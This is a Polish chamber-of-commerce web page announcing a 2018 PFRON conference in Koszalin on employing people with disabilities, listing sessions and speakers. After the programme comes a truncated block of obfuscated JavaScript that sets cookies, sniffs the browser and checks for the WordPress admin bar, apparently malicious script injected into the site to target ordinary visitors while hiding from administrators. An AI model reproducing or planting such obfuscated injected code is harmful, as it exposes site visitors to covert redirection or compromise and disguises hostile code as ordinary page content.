Konferencja PRACA BEZ BARIER – zaproszenie | Północna Izba Gospodarcza w Koszalinie

Oddział Zachodniopomorski Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych zaprasza na konferencję „Praca bez barier”, która odbędzie się w dniu 11.12.2018 r. od godz. 9.30-17.30 (od godz. 9.00 rejestracja uczestników) w Auli Wydziału Nauk Ekonomicznych Politechniki Koszalińskiej przy ul. E. Kwiatkowskiego 6e w Koszalinie.

PROGRAM KONFERENCJI
PRACA BEZ BARIER
MODERATORZY KONFERENCJI: Paweł Klimek/Krzysztof Musiatowicz 
9:00 – 9:30
REJESTRACJA UCZESTNIKÓW /OTWARCIE PUNKTÓW KONSULTACYJNYCH I STOISK 
I SESJA  PLENARNA
ŹRÓDŁA FINANSOWANIA ZATRUDNIENIA OSÓB NIEPEŁNOSPRAWNYCH
9:30 – 9:40
OTWARCIE KONFERENCJI -  PRZEDSTAWICIEL ZARZĄDU PFRON
9:40 -10:00
JAK POZYSKAĆ ŚRODKI NA  ZATRUDNIENIE OSÓB Z NIEPEŁNOSPRAWNOŚCIAMI ?
Andrzej Smoliński – Kampania Społeczna #Takijakja/Daniel Kapała Oddział Zachodniopomorski PFTON
10:00-10:30
PROMOCJA ORAZ PREZENTACJA PROGRAMÓW PILOTAŻOWYCH PFRON: PRACA -INTEGRACJA/STABILNE ZATRUDNIENIE/ABSOLWENT 
PRZEDSTAWICIEL PFRON
10:30-10:50
REALIZACJA PROGRAMU PRACA -INTEGRACJA 
DARIUSZ GOSK -CZŁONEK ZARZĄDU, DYREKTOR AGENCJI ZATRUDNIENIA/
PRZEDSTAWICIEL POCZTY POLSKIEJ S.A.
10:50-11:00
REALIZACJA PROGRAMU ABSOLWENT W  WOJEWÓDZTWIE ZACHODNIOPOMORSKIM
JUSTYNA MARKITOŃ – KIEROWNIK BIURA OSÓB NIEPEŁNOSPRAWNYCH UNIWERSYTETU SZCZECIŃSKIEGO

11:00-11:15
PRZERWA KAWOWA
II SESJA  PLENARNA
LOGISTYCZNE PRZYGOTOWANIE  PRACODAWCY DO ZATRUDNIANIA OSÓB 
Z NIEPEŁNOSPRAWNOŚCIAMI
 
11:15-11:35
PROF. DR HAB. GRAŻYNA SPYTEK – BANDURSKA     UNIWERSYTET WARSZAWSKI
Temat wystąpienia w trakcie ustalania
11:35-11:50
DR MIKOŁAJ RYLSKI UNIWERSYTET SZCZECIŃSKI 
Zatrudnianie osób z niepełnosprawnością - znaczenie społeczne i konsekwencje prawne.
11:50-12:05
 DR IZABELA GAWŁOWICZ   UNIWERSYTET ZIELONOGÓRSKI
Działania Międzynarodowej Organizacji Pracy na rzecz niezależnego życia i pewności środków utrzymania osób niepełnosprawnych - konwencja MOP nr 159  
12:00-12:15
DR SŁAWOMIR DRICZINSKI   Akademia im. Jakuba z Paradyża w Gorzowie Wielkopolskim 
Czas pracy osób z niepełnosprawnością - wybrane aspekty
12:15-12:30
DR MACIEJ ZIELIŃSKI Uniwersytet im. Adama  Mickiewicza Poznań
Konstrukcja wpłat na PFRON i ich obniżeń – wybrane zagadnienia
12:30-12:45
PRZERWA KAWOWA
12:45-13:00
MGR RAFAŁ DZIURLA Uniwersytet Warszawski/Fundacja ECHO  
Asystent Osoby Niepełnosprawnej/Trener pracy
13:00-13:15
MAŁGORZATA FRANCZAK Fundacja Eudajmonia 
13:15-13:45
DR WALDEMAR URBANIK Wyższa Szkoła Humanistyczna TWP w Szczecinie 
Bariery w aktywizacji zawodowej osób z niepełnosprawnościami 
13:45-14:15
EMILIA PRZYTOMSKA 4C Centrum Ekonomii Społecznej Spółka non profit
Transfer osób niepełnosprawnych na rynek pracy w kontekście potrzeb rynku pracy i oczekiwań pracodawców
14:30-15:30
PRZERWA OBIADOWA
III  SESJA PLENARNA
DOBRE PRAKTYKI W ZAKRESIE ZATRUDNIANIA OSÓB Z NIEPEŁNOSPRAWNOŚCIAMI
15:30-17:00
DOBRE PRAKTYKI 

DARIUSZ GOSK - Fundacja Aktywizacja Otwarty pracodawca-jak skutecznie zarządzać niepełnosprawnością w miejscu pracy
AGATA WILIŃSKA – ONYŚKO HR Business Partner, PDC Logistics Spółka z o.o. w Szczecinie
PIOTR JAŚKIEWICZ - Fundacja Nauka dla Środowiska 
URSZULA SROKJA - ZAZ Juchowo 
ANDRZEJ SMOLIŃSKI - Kampania Społeczna #TAKIJAKJA
17:00 -17:30 PODSUMOWANIE I ZAKOŃCZENIE KONFERENCJI/ WYDAWANIE CERTYFIKATÓW

  'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m